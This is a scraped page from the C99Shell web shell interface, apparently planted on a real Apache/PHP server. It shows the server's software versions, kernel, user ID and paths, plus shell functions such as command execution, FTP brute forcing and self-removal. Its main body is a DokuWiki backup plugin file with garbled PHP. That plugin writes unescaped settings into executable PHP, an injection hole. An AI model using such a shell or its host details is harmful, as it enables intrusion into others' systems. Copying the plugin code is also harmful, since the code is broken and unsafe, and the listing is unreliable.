!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g. PHP/5.2.4-2ubuntu5.12 

uname -a: Linux forum.circlefusion.com 2.6.24-19-server #1 SMP Wed Jun 18 15:18:00 UTC 2008 i686 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/home/doku/axrepos/axess/old/wiki/lib/plugins/backup/   drwxrwxr-x
Free 11.48 GB of 97.11 GB (11.82%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pref_code.php (1.4 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/**
 * Backup Tool for DokuWiki
 * 
 * @license    GPL 2 (http://www.gnu.org/licenses/gpl.html)
 * @author     Terence J. Grant<tjgrant@tatewake.com>
 */

$bt_loaded 0;

function 
bt_load()
{
    global 
$bt_loaded$bt_settings;

    
$bt_file dirname(__FILE__).'/local_pref.php';

    if (
$bt_loaded == 0)
    {
        if(
file_exists($bt_file))
        {
            include(
$bt_file);

            
$bt_loaded 1;
        }
    }
}

function 
bt_write($fp$name$val)
{
    
fwrite($fp'$bt_settings[\''.$name.'\'] = \''.$val.'\';'."\n");
}

function 
bt_save()
{
    global 
$bt_loaded$bt_settings;

    
$bt_file dirname(__FILE__).'/local_pref.php';

    if (
is_writable($bt_file) || is_writable(dirname(__FILE__)))
    {
        
$fp fopen($bt_file"w");
        
fwrite($fp'<?php'."\n// This file is automatically generated\n");
        
bt_write($fp'type'$bt_settings['type']);
        
bt_write($fp'pages'$bt_settings['pages']);
        
bt_write($fp'revisions'$bt_settings['revisions']);
        
bt_write($fp'subscriptions'$bt_settings['subscriptions']);
        
bt_write($fp'media'$bt_settings['media']);
        
bt_write($fp'config'$bt_settings['config']);
        
bt_write($fp'templates'$bt_settings['templates']);
        
bt_write($fp'plugins'$bt_settings['plugins']);
        
fclose($fp);

        
ptln('<div class="success">'.'Backup Tool pref saved successfully.'.'</div>');
    }
    else
    {
        
ptln('<div class="error">'.'Backup Tool pref is not writable by the server.'.'</div>');
    }
}

//Load settings
bt_load();

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0216 ]--